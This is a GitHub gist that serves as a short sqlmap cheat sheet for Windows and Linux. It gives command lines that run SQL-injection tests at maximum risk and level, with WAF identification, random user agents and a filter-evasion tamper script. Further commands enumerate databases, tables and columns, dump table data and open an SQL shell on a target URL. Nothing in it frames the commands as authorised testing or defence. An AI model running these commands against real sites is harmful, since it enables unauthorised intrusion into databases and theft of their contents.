Skip to content

Instantly share code, notes, and snippets.

@mstfydmr
Last active March 10, 2019 10:20
Show Gist options
  • Save mstfydmr/162b339bfb14749b2386c197d0f917b7 to your computer and use it in GitHub Desktop.
Save mstfydmr/162b339bfb14749b2386c197d0f917b7 to your computer and use it in GitHub Desktop.
Sqlmap

Windows

C:\Python27\python.exe sqlmap.py -v 3 --risk=3 --level=3 --identify-waf --random-agent --tamper=space2comment -u URL

Linux

./sqlmap.py -v 3 --risk=3 --level=3 --identify-waf --random-agent --tamper=space2comment -u URL

Usage

sqlmap.py -u URL --dbs
sqlmap.py -u URL -D DATABASE --tables
sqlmap.py -u URL -D DATABASE -T TABLE --columns
sqlmap.py -u URL -D DATABASE -T TABLE --dumps
sqlmap.py -u URL --sql-shell
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment